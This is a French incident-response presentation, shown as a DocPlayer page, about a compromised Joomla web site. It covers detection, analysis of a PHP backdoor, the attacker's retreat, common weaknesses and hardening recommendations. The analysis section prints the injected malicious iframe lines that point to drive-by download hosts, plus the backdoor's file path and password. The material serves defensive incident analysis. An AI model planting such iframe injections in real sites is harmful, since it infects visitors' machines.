REX sur incident : cas d un site web compromis

Documents pareils
Projet Sécurité des SI

Sécurité des sites Web Pas un cours un recueil du net. INF340 Jean-François Berdjugin

Atelier Pivoting KHOULOUD GATTOUSSI (RT3) ASMA LAHBIB (RT3) KHAOULA BLEL (RT3) KARIMA MAALAOUI (RT3)

Protection pour site web Sucuri d HostPapa

Retour d expérience sur Prelude

Lyon, mardi 10 décembre 2002! "#$%&"'"# &(

Vulnérabilités et sécurisation des applications Web

Bilan 2008 du Cert-IST sur les failles et attaques

DÉVELOPPER DES APPLICATIONS WEB SÉCURISÉES

Linux. Sécuriser un réseau. 3 e édition. l Admin. Cahiers. Bernard Boutherin Benoit Delaunay. Collection dirigée par Nat Makarévitch

Surveillance stratégique des programmes malveillants avec Nessus, PVS et LCE

Expérience d un hébergeur public dans la sécurisation des sites Web, CCK. Hinda Feriani Ghariani Samedi 2 avril 2005 Hammamet

Audits Sécurité. Des architectures complexes

21 mars Simulations et Méthodes de Monte Carlo. DADI Charles-Abner. Objectifs et intérêt de ce T.E.R. Générer l'aléatoire.

Sécurité des réseaux Les attaques

PPE 2-1 Support Systeme. Partie Support Système

LINUX - Sécurité. Déroulé de l'action. - 3 jours - Contenu de formation

La sécurité applicative et les tests d'intrusion, beaucoup plus qu'un scan automatisé. Conférence ASIQ, mars 2014

Remote Cookies Stealing SIWAR JENHANI (RT4) SOUHIR FARES (RT4)

Etude de la pertinence et de l'intérêt des appliances WAF (IPS web) à l'inria

TEST D INTRUISION. Document Technique

Formation en Sécurité Informatique

SECURIDAY 2012 Pro Edition

Gestion des Incidents SSI

Mise en place d une politique de sécurité

Aperçu technique Projet «Internet à l école» (SAI)

Présentation de la solution Open Source «Vulture» Version 2.0

OZSSI NORD 4 JUIN LILLE. Conférence thématique: Sécurité des applications

laposte.net) Ministère de l'éducation nationale Atelier sécurité Rabat RALL 2007

Menaces du Cyber Espace

1. En moyenne, un ordinateur sans protection connecté à Internet est infecté après... quelques minutes heures 3 jours plus d une semaine

Botnets, les fantômes de l internet. 6 Novembre Iheb Khemissi - iheb.khemissi@gmail.com Joris Brémond - joris.bremond@gmail.

99% des failles de sécurité dans les entreprises

L hygiène informatique en entreprise Quelques recommandations simples

Catalogue Audit «Test Intrusion»

Firewall IDS Architecture. Assurer le contrôle des connexions au. Sécurité 1

Protection des protocoles

Table des matières GUIDE D HYGIÈNE INFORMATIQUE

L état de l ART. Évolution récente des technologies. Denis Szalkowski Formateur Consultant

Découverte d aesecure. Par Christophe Avonture, développeur d aesecure

Technologies du Web. Créer et héberger un site Web. Pierre Senellart. Page 1 / 26 Licence de droits d usage

Computer Emergency Response Team. Industrie Services Tertiaire. David TRESGOTS. 13 juin 2012 Forum Cert-IST Industrie Services Tertiaire

< <

Attaques applicatives

CHAPITRE 3 : INTERVENTIONS SUR INCIDENTS

Fiche Technique. Cisco Security Agent

<Insert Picture Here>ApExposé. Cédric MYLLE 05 Février Exposé Système et Réseaux : ApEx, Application Express d Oracle

Présenté par : Mlle A.DIB

Détection d'intrusions et analyse forensique

Trend Micro Worry-Free Business Security 8.0 Première installation : trucs et astuces

Spécifications Techniques Générales. Techno Pole Internet. Lycée Djignabo / Ziguinchor

DATASET / NETREPORT, propose une offre complète de solutions dans les domaines suivants:

dans un contexte d infogérance J-François MAHE Gie GIPS

NOMADES ET SMARTPHONES EN ENTREPRISE EN TOUTE SÉCURITÉ PAR BERTRAND THOMAS ET JULIEN COULET

Faits techniques et retour d'expérience d'une cellule d'expertise dans la lutte contre le code malveillant. EdelWeb / Groupe ON-X

Catalogue «Intégration de solutions»

Infrastructure Management

OFF OF R F E R E DE D E S TA T G A E G 02/04/09

Sécurisation du centre de services au sein du cloud computing La stratégie de sécurité de BMC pour l environnement SaaS LIVRE BLANC

Dr.Web Les Fonctionnalités

Fingerprinting d'applications Web

Zabbix. Solution de supervision libre. par ALIXEN

Etat des lieux sur la sécurité de la VoIP

La citadelle électronique séminaire du 14 mars 2002

Présentation du 30/10/2012. Giving security a new meaning

Opérateur global de la performance IT

Rôle des FAI et des Datacenters dans les dispositifs de cyber-sécurité Ou comment tenter de rendre l Internet plus sûr.

La protection des systèmes Mac et Linux : un besoin réel?

Congrès national des SDIS 2013

Clauses d'hébergement web

Test d un système de détection d intrusions réseaux (NIDS)

LES REGLES ELEMENTAIRES DE SECURITE LE POSTE DE TRAVAIL. CNRS RSSIC version du 11 mai 2012

QUESTIONS / REPONSES ESET Smart Security ESET NOD32 Antivirus V.3

Club des Responsables d Infrastructures et de la Production

«Obad.a» : le malware Android le plus perfectionné à ce jour

Description de l implantation dans le centre d examen (nom du service ou de l outil et caractéristiques techniques)

Une approche positive du filtrage applicatif Web. Didier «grk» Conchaudron Sébastien «blotus» Blot

Créer un tableau de bord SSI

Ce document décrit une solution de single sign-on (SSO) sécurisée permettant d accéder à Microsoft Exchange avec des tablettes ou smartphones.

IPS : Corrélation de vulnérabilités et Prévention des menaces

4. SERVICES WEB REST 46

Traitement des Données Personnelles 2012

VoIP : Introduction à la sécurité. VoIP : Introduction à la sécurité

Table des matières. Avant-propos... Préface... XIII. Remerciements...

cas pratique La cybersécurité des systèmes industriels

DenyAll Detect. Documentation technique 27/07/2015

Sécurité informatique: introduction

TUTORIAL ULTRAVNC (EDITION 2)

Paul FLYE SAINTE MARIE

DenyAll Protect. Sécurité & accélération. Parefeux pour applications et services Web. de vos applications.

LIVRE BLANC. Mise en œuvre d un programme efficace de gestion des vulnérabilités

Approche Méthodologique de la Gestion des vulnérabilités. Jean-Paul JOANANY - RSSI

Joomla! Création et administration d'un site web - Version numérique

Installation de Premium-RH

Conception et réalisation d uned architecture tolérant les intrusions pour des serveurs Internet

ISO/CEI 27001:2005 ISMS -Information Security Management System

Transcription:

REX sur incident : cas d un site web compromis Juin 2013 Philippe Bourgeois Plan de la présentation 1) Analyse d une compromission web Détection Analyse Remise en service Conclusions 2) Les faiblesses le plus souvent constatées Constats Recommandations page 2 1

1: Analyse d une compromission web 1.1 - Détection Google indique que le site web est dangereux page 4 2

1.2 - Analyse Constats 650 fichiers «.js» du site web ont été infectés document.write('<iframe src="http://google.com" scrolling="auto«frameborder="no" align="center" height="11" width="11"></iframe>'); Toutes les 30 minutes les fichiers sont ré-infectés 21:10:59 : <iframe src="http://eisczfg.freewww.info/facebook.cgi?8 22:25:23 : <iframe src="http://jevvke.pcanywhere.net/facebook.cgi?8 22:57:47 : <iframe src="http://kxsgd.ddns.info/facebook.cgi?8: 23:16:36 : <iframe src="http://oaiudvzrx.myftp.name/facebook.cgi?8 Le but est d infecter les visiteurs du site web infecté (drive-by download) Une backdoor est trouvée sur le site /images/banners/.lib_doyoa8.php Mot de passe : )GjKGqGZ page 5 1.2 - Analyse Encodage de la backdoor page 6 3

1.2 - Analyse Observation Toutes les 30 minutes un script PHP est envoyé à la backdoor L analyse de log ne permet pas d identifier formellement la méthode d infection Brute-force sur l interface d administration? Vulnérabilité dans le plugin JCE de Joomla? (file upload) page 7 1.3 - Remise en service Il est décidé d un plan d éradication de l infection Mais, avant le T0, le pirate opère un mouvement de repli : Il nettoie lui-même les fichiers infectés Et s en va (en laissant sa backdoor ) Le pirate préfère abandonner sa victime plutôt que de mettre en danger son infrastructure. page 8 4

1.4 - Conclusions L attaquant est professionnel Il n introduit pas de dysfonctionnements (discrétion, non détection) Il a un plan d action prédéfini (campagne, actions de replis) Il utilise les mêmes outils que les amateurs mais «bien»! Backdoor connue. Pilotée par des scripts PHP de bonne qualité Actions automatisées (scan, compromission, campagne d infection, etc ) page 9 2: Les faiblesses le plus souvent constatées 5

Constats 100% des attaques analysées utilisent des faiblesses connues Vulnérabilités connues (et correctifs non appliqués) Mots de passe triviaux sur des comptes administrateurs Si les sites web ne sont pas mis à jour, ils seront compromis! Certaines architectures n ont pas été conçues en prenant en compte la sécurité Pas de cloisonnement entre les sites web hébergés sur une même machine (pas de «chroot», le même «uid» pour tous les sites) L interface d administration n est pas protégée Fonctions «back-office» accessible depuis Internet, sans restriction. Un audit intrusif a-t-il inclus dans son périmètre ce «back-office». ainsi que les autres sites hébergés sur la même machine? page 11 Recommandations Prévention Détection Limiter l impact Traitement Les sites web doivent être maintenus à jour en termes de correctifs de sécurité Mise à jour régulière des serveurs (Apache, IIS) et des frameworks sous-jacents (Joomla, Symphony, RubyOnRail, Java,.Net, etc..) Empêcher ou détecter les attaques connues WAF / IDS / Antivirus Isoler pour éviter la conséquence d une compromission Autoriser uniquement le HTTP et HTTPS en entrée Et tout interdire en sortie (ce qui implique que les flux DNS et mail passent par des infra DMZ dédiées) Conserver les logs et analyser les incidents de sécurité page 12 6

QUESTIONS? page 13 7

2024 © DocPlayer.fr Politique de confidentialité | Conditions de service | Feed-back